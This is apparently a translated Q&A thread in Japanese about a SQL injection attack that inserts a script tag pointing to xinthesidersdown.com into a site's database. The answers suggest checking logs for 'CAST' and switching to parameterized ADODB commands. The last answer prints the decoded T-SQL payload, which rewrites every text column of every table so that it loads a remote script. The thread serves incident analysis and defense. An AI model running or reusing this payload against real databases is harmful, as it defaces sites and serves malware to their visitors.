1

<script src="http://xinthesidersdown.com">クライアントサーバーに注入されているようです。ログをチェックして、注入された場所と方法を確認しました。残念ながら、xinthesidersdown注入されたかどうかを検索すると、結果が表示されません。侵入者がどのように侵入し、このコードをデータベースに挿入しているのかを知るための提案はありますか? ありがとうございました。

4

3 に答える 3

2

ログエントリで「CAST」という単語を探します...

于 2012-08-01T08:22:34.040 に答える
2

私も同じ問題を抱えてる。

以前にもいくつかのデータベース インジェクションがありましたが、通常の開始レコードセットを ADODB コマンドの実行に置き換えることで、それらを停止することができました。

例:

前:

szSQL = "SELECT ...."
adoRstM.CursorLocation = adUseClient
adoRstM.CursorType = adOpenStatic
adoRstM.LockType = adLockBatchOptimistic
adoRstM.Open szSQL, adoCon


Set objCommand = Server.CreateObject("ADODB.COMMAND")
Set objCommand.ActiveConnection = adoCon
objCommand.CommandText = szSQL
objCommand.CommandType = adCmdText
Set param1 = objCommand.CreateParameter ("nMenu", adInteger, adParamInput)
param1.value = Cint(nMenu)
objCommand.Parameters.Append param1
Set param1 = objCommand.CreateParameter ("nSubMenu", adInteger, adParamInput)
param1.value = Cint(nSubMenu)
objCommand.Parameters.Append param1
Set adoRstM = objCommand.Execute()

しかし、どこでも交換する必要がありました。

私は今、私たちのウェブサイトをチェックしています - 見落としがあるかもしれません. 多分これはあなたを助ける...

于 2012-08-01T07:47:49.847 に答える
2

Einav の回答 (私は彼女と協力しています) を詳しく説明すると、注入ペイロードは、CAST 関数を使用して 16 進形式のペイロードを実際の悪意のあるクエリ文字列に変換することで難読化され、SQL exec コマンドによって実行されます。一般的なインジェクション形式は、ここで確認でき ます。

この場合の特定のペイロードは次のように変換されます。

set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>30 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=''"></title><script src="http://xinthesidersdown.com/sl.php"></script><!--''+RTRIM(CONVERT(VARCHAR(6000),['+@C+'])) where LEFT(RTRIM(CONVERT(VARCHAR(6000),['+@C+'])),17)<>''"></title><script'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

それが役立つことを願っています。

于 2012-08-01T10:37:04.450 に答える